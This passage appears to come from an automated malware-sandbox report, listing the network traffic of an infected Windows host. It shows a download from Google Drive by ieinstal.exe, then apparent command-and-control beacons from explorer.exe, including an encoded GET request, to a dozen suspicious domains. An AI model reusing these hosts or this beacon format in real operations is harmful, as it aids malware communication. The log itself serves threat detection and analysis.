Mar 2, 2023 17:21:09.056483030 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:10.380400896 CET	49744	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:10.553344011 CET	80	49744	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:10.553529978 CET	49744	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:10.570705891 CET	49744	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:10.743436098 CET	80	49744	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:10.783762932 CET	80	49744	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:10.783843994 CET	80	49744	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:10.784254074 CET	49744	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:10.817622900 CET	49744	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:10.990328074 CET	80	49744	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:16.131556988 CET	49745	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:16.405126095 CET	80	49745	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:16.405347109 CET	49745	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:16.405427933 CET	49745	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:16.678832054 CET	80	49745	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:16.679384947 CET	80	49745	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:16.679409027 CET	80	49745	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:16.679500103 CET	49745	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:17.917694092 CET	49745	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:18.933240891 CET	49746	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:19.207108974 CET	80	49746	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:19.207389116 CET	49746	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:19.207670927 CET	49746	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:19.480839968 CET	80	49746	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:19.481129885 CET	80	49746	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:19.481684923 CET	80	49746	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:19.481726885 CET	80	49746	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:19.481828928 CET	49746	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:20.713716984 CET	49746	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:22.456919909 CET	49747	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:22.730633974 CET	80	49747	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:22.731102943 CET	49747	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:22.998176098 CET	49747	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:23.004960060 CET	80	49747	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:23.273761988 CET	80	49747	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:23.273787975 CET	80	49747	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:23.273925066 CET	49747	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:23.321396112 CET	49747	80	192.168.2.6	49.212.180.95
Mar 2, 2023 17:21:23.595243931 CET	80	49747	49.212.180.95	192.168.2.6
Mar 2, 2023 17:21:29.656658888 CET	49749	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:29.673675060 CET	80	49749	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:29.673839092 CET	49749	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:29.712152958 CET	49749	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:29.729276896 CET	80	49749	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:31.215738058 CET	49749	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:31.233073950 CET	80	49749	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:31.233372927 CET	49749	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:32.233031034 CET	49750	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:32.249851942 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.249978065 CET	49750	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:32.250197887 CET	49750	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:32.266997099 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.267051935 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.676985025 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.677018881 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.677037001 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.677052021 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:32.677102089 CET	49750	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:32.693680048 CET	80	49750	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:34.777889967 CET	49751	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:34.794707060 CET	80	49751	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:34.794933081 CET	49751	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:34.795133114 CET	49751	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:34.813179016 CET	80	49751	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:35.468508005 CET	80	49751	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:35.468625069 CET	80	49751	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:35.468694925 CET	49751	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:35.468878984 CET	49751	80	192.168.2.6	66.235.200.145
Mar 2, 2023 17:21:35.485347986 CET	80	49751	66.235.200.145	192.168.2.6
Mar 2, 2023 17:21:40.541857004 CET	49752	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:40.558665991 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.558903933 CET	49752	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:40.559387922 CET	49752	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:40.575891018 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.766362906 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.766437054 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.766457081 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.766474009 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.766491890 CET	80	49752	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:40.766577005 CET	49752	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:40.766661882 CET	49752	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:42.075145960 CET	49752	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:43.090871096 CET	49753	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:43.107748985 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.112361908 CET	49753	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:43.112483978 CET	49753	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:43.129132032 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.129173994 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.323788881 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.323815107 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.323828936 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.323837996 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.323935032 CET	80	49753	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:43.324011087 CET	49753	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:43.324079990 CET	49753	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:44.623258114 CET	49753	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.637909889 CET	49754	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.655038118 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:45.655796051 CET	49754	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.655917883 CET	49754	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.673141956 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:45.876478910 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:45.876507044 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:45.876522064 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:45.876647949 CET	49754	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.876863956 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:45.878923893 CET	49754	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.878942966 CET	49754	80	192.168.2.6	104.21.67.180
Mar 2, 2023 17:21:45.895519972 CET	80	49754	104.21.67.180	192.168.2.6
Mar 2, 2023 17:21:50.954586029 CET	49755	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:50.973351955 CET	80	49755	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:50.973567009 CET	49755	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:50.973714113 CET	49755	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:50.992368937 CET	80	49755	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:50.995425940 CET	80	49755	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:50.995444059 CET	80	49755	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:50.995507002 CET	49755	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:52.481940031 CET	49755	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:53.497992039 CET	49756	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:53.514889956 CET	80	49756	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:53.516968966 CET	49756	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:53.517451048 CET	49756	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:53.534147024 CET	80	49756	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:53.534190893 CET	80	49756	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:53.539091110 CET	80	49756	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:53.539158106 CET	80	49756	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:53.539256096 CET	49756	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:55.029200077 CET	49756	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.045274973 CET	49757	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.062022924 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:56.066524982 CET	49757	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.066778898 CET	49757	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.084920883 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:56.136593103 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:56.136645079 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:56.136665106 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:56.136682987 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:21:56.136878967 CET	49757	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.136931896 CET	49757	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.144911051 CET	49757	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:21:56.163192034 CET	80	49757	34.117.168.233	192.168.2.6
Mar 2, 2023 17:22:01.184453011 CET	49758	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:01.201283932 CET	80	49758	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:01.201484919 CET	49758	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:01.202332973 CET	49758	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:01.219079971 CET	80	49758	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:01.219765902 CET	80	49758	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:01.219789982 CET	80	49758	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:01.219891071 CET	49758	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:02.722903967 CET	49758	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:03.751538038 CET	49759	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:03.768248081 CET	80	49759	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:03.768404961 CET	49759	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:03.769668102 CET	49759	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:03.786300898 CET	80	49759	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:03.786328077 CET	80	49759	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:03.786488056 CET	80	49759	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:03.786504984 CET	80	49759	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:03.786596060 CET	49759	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:05.307898998 CET	49759	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:06.326530933 CET	49760	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:06.343549013 CET	80	49760	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:06.343672037 CET	49760	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:06.344923973 CET	49760	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:06.361752987 CET	80	49760	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:06.363009930 CET	80	49760	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:06.363034964 CET	80	49760	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:06.363207102 CET	49760	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:06.419332027 CET	49760	80	192.168.2.6	212.227.172.253
Mar 2, 2023 17:22:06.436340094 CET	80	49760	212.227.172.253	192.168.2.6
Mar 2, 2023 17:22:16.886868954 CET	49761	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:22:16.906999111 CET	80	49761	34.117.168.233	192.168.2.6
Mar 2, 2023 17:22:16.908483028 CET	49761	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:22:16.908564091 CET	49761	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:22:16.926990032 CET	80	49761	34.117.168.233	192.168.2.6
Mar 2, 2023 17:22:16.930386066 CET	80	49761	34.117.168.233	192.168.2.6
Mar 2, 2023 17:22:16.930417061 CET	80	49761	34.117.168.233	192.168.2.6
Mar 2, 2023 17:22:16.930509090 CET	49761	80	192.168.2.6	34.117.168.233
Mar 2, 2023 17:22:18.421492100 CET	49761	80	192.168.2.6	34.117.168.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 2, 2023 17:18:24.218556881 CET	59504	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:18:24.245341063 CET	53	59504	8.8.8.8	192.168.2.6
Mar 2, 2023 17:18:24.882304907 CET	62910	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:18:24.908251047 CET	53	62910	8.8.8.8	192.168.2.6
Mar 2, 2023 17:18:24.925307035 CET	63863	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:18:24.953097105 CET	53	63863	8.8.8.8	192.168.2.6
Mar 2, 2023 17:19:40.782335043 CET	56547	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:19:40.811106920 CET	53	56547	8.8.8.8	192.168.2.6
Mar 2, 2023 17:19:41.849251986 CET	59881	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:19:41.875344992 CET	53	59881	8.8.8.8	192.168.2.6
Mar 2, 2023 17:20:18.601315022 CET	50343	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:20:18.867404938 CET	53	50343	8.8.8.8	192.168.2.6
Mar 2, 2023 17:20:24.656301022 CET	62520	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:20:24.765434027 CET	53	62520	8.8.8.8	192.168.2.6
Mar 2, 2023 17:20:41.981051922 CET	52079	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:20:42.024279118 CET	53	52079	8.8.8.8	192.168.2.6
Mar 2, 2023 17:20:53.636869907 CET	56569	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:20:53.660446882 CET	53	56569	8.8.8.8	192.168.2.6
Mar 2, 2023 17:21:04.554657936 CET	65044	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:21:04.673316002 CET	53	65044	8.8.8.8	192.168.2.6
Mar 2, 2023 17:21:15.858999014 CET	60032	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:21:16.127304077 CET	53	60032	8.8.8.8	192.168.2.6
Mar 2, 2023 17:21:29.489450932 CET	49232	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:21:29.648994923 CET	53	49232	8.8.8.8	192.168.2.6
Mar 2, 2023 17:21:40.484322071 CET	59752	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:21:40.509732962 CET	53	59752	8.8.8.8	192.168.2.6
Mar 2, 2023 17:21:50.921145916 CET	52865	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:21:50.953458071 CET	53	52865	8.8.8.8	192.168.2.6
Mar 2, 2023 17:22:01.157537937 CET	57322	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:22:01.181252956 CET	53	57322	8.8.8.8	192.168.2.6
Mar 2, 2023 17:22:16.829152107 CET	62958	53	192.168.2.6	8.8.8.8
Mar 2, 2023 17:22:16.886045933 CET	53	62958	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 2, 2023 17:18:24.218556881 CET	192.168.2.6	8.8.8.8	0x34ff	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:18:24.882304907 CET	192.168.2.6	8.8.8.8	0xf587	Standard query (0)	doc-14-7s-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:18:24.925307035 CET	192.168.2.6	8.8.8.8	0xefd7	Standard query (0)	doc-14-7s-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:19:40.782335043 CET	192.168.2.6	8.8.8.8	0xd18a	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:19:41.849251986 CET	192.168.2.6	8.8.8.8	0xe46d	Standard query (0)	doc-14-7s-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:18.601315022 CET	192.168.2.6	8.8.8.8	0x340f	Standard query (0)	www.star-house.okinawa	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:24.656301022 CET	192.168.2.6	8.8.8.8	0x66a	Standard query (0)	www.nichevesting.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:41.981051922 CET	192.168.2.6	8.8.8.8	0xda83	Standard query (0)	www.bebas88official.click	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:53.636869907 CET	192.168.2.6	8.8.8.8	0xa585	Standard query (0)	www.deepee.xyz	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:04.554657936 CET	192.168.2.6	8.8.8.8	0xece8	Standard query (0)	www.bestservicesandtrade.org	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:15.858999014 CET	192.168.2.6	8.8.8.8	0xdb77	Standard query (0)	www.denko-kosan.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:29.489450932 CET	192.168.2.6	8.8.8.8	0x6a78	Standard query (0)	www.shivanshnegi.com	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:40.484322071 CET	192.168.2.6	8.8.8.8	0x7992	Standard query (0)	www.xn--lst4d-fwa.site	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:50.921145916 CET	192.168.2.6	8.8.8.8	0xca8f	Standard query (0)	www.ghostdyes.net	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:22:01.157537937 CET	192.168.2.6	8.8.8.8	0x2764	Standard query (0)	www.julesgifts.co.uk	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:22:16.829152107 CET	192.168.2.6	8.8.8.8	0xb6bb	Standard query (0)	www.chemkimcorp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 2, 2023 17:18:24.245341063 CET	8.8.8.8	192.168.2.6	0x34ff	No error (0)	drive.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:18:24.908251047 CET	8.8.8.8	192.168.2.6	0xf587	No error (0)	doc-14-7s-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:18:24.908251047 CET	8.8.8.8	192.168.2.6	0xf587	No error (0)	googlehosted.l.googleusercontent.com		172.217.168.65	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:18:24.953097105 CET	8.8.8.8	192.168.2.6	0xefd7	No error (0)	doc-14-7s-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:18:24.953097105 CET	8.8.8.8	192.168.2.6	0xefd7	No error (0)	googlehosted.l.googleusercontent.com		172.217.168.65	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:18:52.594078064 CET	8.8.8.8	192.168.2.6	0x93ce	No error (0)	au.c-0001.c-msedge.net	c-0001.c-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:18:52.594078064 CET	8.8.8.8	192.168.2.6	0x93ce	No error (0)	c-0001.c-msedge.net		13.107.4.50	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:19:40.811106920 CET	8.8.8.8	192.168.2.6	0xd18a	No error (0)	drive.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:19:41.875344992 CET	8.8.8.8	192.168.2.6	0xe46d	No error (0)	doc-14-7s-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:19:41.875344992 CET	8.8.8.8	192.168.2.6	0xe46d	No error (0)	googlehosted.l.googleusercontent.com		172.217.168.65	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:18.867404938 CET	8.8.8.8	192.168.2.6	0x340f	No error (0)	www.star-house.okinawa		183.181.84.3	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:24.765434027 CET	8.8.8.8	192.168.2.6	0x66a	No error (0)	www.nichevesting.com		52.20.84.62	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:42.024279118 CET	8.8.8.8	192.168.2.6	0xda83	No error (0)	www.bebas88official.click	bebas88official.click		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:20:42.024279118 CET	8.8.8.8	192.168.2.6	0xda83	No error (0)	bebas88official.click		172.96.191.163	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:20:53.660446882 CET	8.8.8.8	192.168.2.6	0xa585	No error (0)	www.deepee.xyz		162.0.236.127	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:04.673316002 CET	8.8.8.8	192.168.2.6	0xece8	No error (0)	www.bestservicesandtrade.org	bestservicesandtrade.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:21:04.673316002 CET	8.8.8.8	192.168.2.6	0xece8	No error (0)	bestservicesandtrade.org		208.109.43.28	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:16.127304077 CET	8.8.8.8	192.168.2.6	0xdb77	No error (0)	www.denko-kosan.com	denko-kosan.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:21:16.127304077 CET	8.8.8.8	192.168.2.6	0xdb77	No error (0)	denko-kosan.com		49.212.180.95	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:29.648994923 CET	8.8.8.8	192.168.2.6	0x6a78	No error (0)	www.shivanshnegi.com	shivanshnegi.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:21:29.648994923 CET	8.8.8.8	192.168.2.6	0x6a78	No error (0)	shivanshnegi.com		66.235.200.145	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:40.509732962 CET	8.8.8.8	192.168.2.6	0x7992	No error (0)	www.xn--lst4d-fwa.site		104.21.67.180	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:40.509732962 CET	8.8.8.8	192.168.2.6	0x7992	No error (0)	www.xn--lst4d-fwa.site		172.67.179.81	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:21:50.953458071 CET	8.8.8.8	192.168.2.6	0xca8f	No error (0)	www.ghostdyes.net	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:21:50.953458071 CET	8.8.8.8	192.168.2.6	0xca8f	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:21:50.953458071 CET	8.8.8.8	192.168.2.6	0xca8f	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:22:01.181252956 CET	8.8.8.8	192.168.2.6	0x2764	No error (0)	www.julesgifts.co.uk		212.227.172.253	A (IP address)	IN (0x0001)	false
Mar 2, 2023 17:22:16.886045933 CET	8.8.8.8	192.168.2.6	0xb6bb	No error (0)	www.chemkimcorp.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:22:16.886045933 CET	8.8.8.8	192.168.2.6	0xb6bb	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 2, 2023 17:22:16.886045933 CET	8.8.8.8	192.168.2.6	0xb6bb	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-14-7s-docs.googleusercontent.com

www.star-house.okinawa

www.nichevesting.com

www.bebas88official.click

www.deepee.xyz

www.bestservicesandtrade.org

www.denko-kosan.com

www.shivanshnegi.com

www.xn--lst4d-fwa.site

www.ghostdyes.net

www.julesgifts.co.uk

www.chemkimcorp.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49712	142.250.203.110	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49714	172.217.168.65	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49737	172.96.191.163	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:48.463335037 CET	1038	OUT	GET /g0c0/?J1ZahCdL=7AoghRD8g0/kfvEsx2sU95A2LZSx6NsCVfQQj+6UBm4+ru4nOpfQ9Q9UKAYKj24R1kRNFhy6UoFNSsJ6pUxzKJj896DDYPcMBEzuDMgRmTEe&uEk=kKVhb1ODb HTTP/1.1 Host: www.bebas88official.click Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:20:48.623842955 CET	1039	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Thu, 02 Mar 2023 16:20:48 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 